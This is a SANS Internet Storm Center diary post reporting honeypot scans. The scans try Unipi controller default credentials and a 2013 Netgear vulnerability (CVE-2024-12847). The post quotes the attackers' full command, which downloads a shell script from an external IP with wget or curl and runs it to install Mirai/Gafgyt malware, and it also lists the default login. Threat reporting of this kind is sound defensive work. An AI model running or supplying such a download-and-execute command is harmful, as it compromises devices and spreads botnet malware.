It Is 2025, And We Are Still Dealing With Default IoT Passwords And Stupid 2013 Router Vulnerabilities

    Published: 2025-05-12. Last Updated: 2025-05-12 13:49:21 UTC
    by Johannes Ullrich (Version: 1)
    0 comment(s)

    Unipi Technologies is a company developing programmable logic controllers for a number of different applications like home automation, building management, and industrial controls. The modules produced by Unipi are likely to appeal to a more professional audience. All modules are based on the "Marvis" platform, a customized Linux distribution maintained by Unipi.

    In the last couple of days, we did observe scans for the unipi default username and password ("unipi" and "unipi.technology")  in our honeypot logs. The scans originate from 176.65.148.10, an IP address that is well-known to our database.

    In addition to SSH, the IP address also scans for an ancient Netgear vulnerability from 2013, which only got a CVE number last year (CVE-2024-12847). 

    Both, the SSH as well as the "Netgear" exploit attempts are executing the same commands:

    cd /tmp; rm -rf wget.sh curl.sh; wget http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh;curl -o http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh

    which kicks off the standard Mirai/Gafgyt install chain.

     

     

    ---
    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
    Twitter|

    0 comment(s)
    ISC Stormcast For Monday, May 12th, 2025 https://isc.sans.edu/podcastdetail/9446

      Comments


      Diary Archives